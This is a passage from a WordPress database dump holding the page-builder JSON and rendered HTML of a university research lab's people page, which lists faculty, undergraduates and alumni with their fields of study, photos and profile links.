https:\\/\\/www.linkedin.com\\/in\\/mdraiyanhaque\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c150\",\"index\":1,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c144\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c143\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c157\",\"parentId\":\"182-c156\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c156\",\"parentId\":\"182-c155\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c155\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c160\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1772,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c160\",\"index\":2,\"id\":\"182-c163\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c160\",\"index\":1,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c165\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Anvith-e1697208489419.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1780,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c165\",\"index\":2,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c165\",\"index\":1,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c170\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Alex-e1697208598736.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1782,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c170\",\"index\":2,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c170\",\"index\":1,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c175\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c176\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1784,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c175\",\"index\":2,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c175\",\"index\":1,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c180\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c181\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1786,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c180\",\"index\":2,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c180\",\"index\":1,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c185\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c186\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1788,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c185\",\"index\":2,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c185\",\"index\":1,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c190\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1790,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c190\",\"index\":2,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c190\",\"index\":1,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c195\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c196\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1792,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":2,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c199\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1794,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c201\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c199\",\"index\":2,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c199\",\"index\":1,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c212\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c212\",\"index\":0,\"id\":\"182-c213\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1795,\"size\":\"\"},\"domuuid\":\"182-c161\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c212\",\"index\":0,\"id\":\"182-c214\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Eliza Schuh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c212\",\"index\":2,\"id\":\"182-c215\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/search\\/results\\/all\\/?fetchDeterministicClustersOnly=true&heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&keywords=eliza%20schuh&origin=RICH_QUERY_TYPEAHEAD_HISTORY&position=0&searchId=e7657352-5ea3-4501-b984-d21542771bc4&sid=WW)&spellCorrectionEnabled=true\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c212\",\"index\":1,\"id\":\"182-c216\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c204\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c205\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bronson-e1697209357897.png\",\"caption\":{\"text\":\"\"},\"imageId\":1797,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c204\",\"index\":2,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c204\",\"index\":1,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c159\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c158\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c211\",\"parentId\":\"182-c210\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c210\",\"parentId\":\"182-c209\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c209\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-10-13 11:04:29','2023-10-13 15:04:29','',562,'https://gsudice.dataconn.net/?p=1805',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1806,1,'2023-10-13 11:04:29','2023-10-13 15:04:29','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c64\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c64 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c65-outer\">\n            <div data-colibri-id=\"182-c65\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c65 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-986 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c66\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 